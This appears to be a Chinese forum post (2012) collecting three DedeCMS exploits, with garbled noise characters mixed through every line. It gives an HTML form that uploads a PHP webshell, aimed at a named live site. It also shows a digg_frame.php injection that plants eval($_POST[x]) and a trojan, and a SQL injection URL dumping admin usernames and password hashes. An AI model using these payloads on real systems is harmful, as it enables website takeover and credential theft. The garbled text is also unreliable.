: P/ R, B5 t! s) P; O% Z* p$ k; W
+ i; A& R" D8 @. x8 B
- P0 l- a9 X' y; _织梦(Dedecms)select_soft_post.php页面变量未初始漏洞* C% b$ S+ e3 n
<html>" S* Q, v: Y r ]
<head>
9 J, m! f0 Y7 N7 c; \; L% u<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
6 r4 ^6 d9 ]0 v/ Y0 }3 ^& |+ ?" D</head>8 h: H$ @' m! { N
<body style="FONT-SIZE: 9pt">
1 s6 q4 E$ b9 h$ F8 S$ p! ^' D---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />$ x7 k4 f6 {' C; a6 T8 }
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>; |( a4 u7 z5 \& w$ Z5 m
<input type='hidden' name='activepath' value='/data/cache/' />
- e/ }0 Q1 j4 U5 u<input type='hidden' name='cfg_basedir' value='../../' />
7 I# N' k9 V/ Y- }/ L<input type='hidden' name='cfg_imgtype' value='php' />
3 i3 C+ H* g9 O) x<input type='hidden' name='cfg_not_allowall' value='txt' />
: _: n) ?' |3 D5 k% _4 N<input type='hidden' name='cfg_softtype' value='php' />
a, z( F) v4 G8 J<input type='hidden' name='cfg_mediatype' value='php' />, u, F# \& K" m
<input type='hidden' name='f' value='form1.enclosure' /> Q2 Z& y# z; M" T
<input type='hidden' name='job' value='upload' />
1 @; ^$ Q8 X5 g<input type='hidden' name='newname' value='fly.php' />
. S2 s! G3 c1 }Select U Shell <input type='file' name='uploadfile' size='25' />/ K p+ [- {, C; G
<input type='submit' name='sb1' value='确定' />
+ F2 F) M4 O1 M. {1 x8 ~$ |</form># s( I, @1 ?/ n# V$ M, l; A. g6 g
<br />It's just a exp for the bug of Dedecms V55...<br />
7 p; F. A7 g0 RNeed register_globals = on...<br />
# B3 w7 Z( w1 H9 Y* y* eFun the game,get a webshell at /data/cache/fly.php...<br />3 N2 O/ } h" ^( S
</body>: f6 x& q: X8 ]! Z
</html>
3 v/ _6 U+ d$ `$ w* l J
* i/ [! W$ O! t0 ~# e4 S7 J, z3 d2 i% P% ]& j6 h- i
& N# q$ P2 n) C4 \/ N. L' `! }7 w) r3 D5 k/ Q3 e. E
' E! \# G6 h! i- I" q2 t
4 a1 G. I) I6 M) T: _
. |2 Z& V3 V( I- i% R( L
0 K5 t. P8 K6 p1 c; `
5 _- I0 c. S% j) x4 h/ W, u# y7 E, I$ L6 [ T3 ^7 d% b
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞/ V3 f- v, ]1 F3 l
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
) X5 s0 v9 a2 P" a9 W: f1. 访问网址:8 M/ Z$ z) ~$ u: y
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>) q0 S2 C% }3 r3 {6 R4 W& S
可看见错误信息: p+ v: g1 L# X7 I
" A! D4 E. w' U- M e7 r' V) Y
/ A; c) F3 V- [& M3 \5 B
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。+ N1 _$ H1 q- w% d5 M# G
int(3) Error: Illegal double '1024e1024' value found during parsing
0 a$ h/ N% Q/ F0 p3 @+ q- r- j. JError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
9 A, y7 |4 ]' R) _' p- E
8 S6 ^$ w/ n; k! }! D/ ?1 j0 T7 v6 w( t- H1 w/ c
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
% K1 |! W/ n0 o9 O P7 W9 J
7 E3 N" c6 \" p+ s6 B! v$ r3 u/ [. g0 Y b
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
6 O: m% h$ ]3 ], O
8 b q. X: V3 h0 b4 G- p G0 ^, y- m% l
按确定后的看到第2步骤的信息表示文件木马上传成功.- R5 Q. p8 k+ R/ e
: u/ U1 T9 `3 p* I
; ?% j- z+ a) v
5 r+ A& U! U* ?$ Y0 r: Q' W; \9 |
4 B' c4 ]! I: s7 @6 l7 d
. j# N$ a4 \5 s2 _" k5 D- P
+ ?* {1 b7 i% b! v) p) U
6 M0 C1 ^! Y8 m2 g" ~1 K7 Z
/ Q; Q% N T: H: I3 n5 L4 ^
* L) }( F3 V4 j4 y! C6 {$ A3 m( T2 w6 G- O
0 P8 D. `! f0 w3 u* ]% ^1 W$ w3 Z. o/ ]3 L2 u
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
/ g9 ^+ {- x" {1 `http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对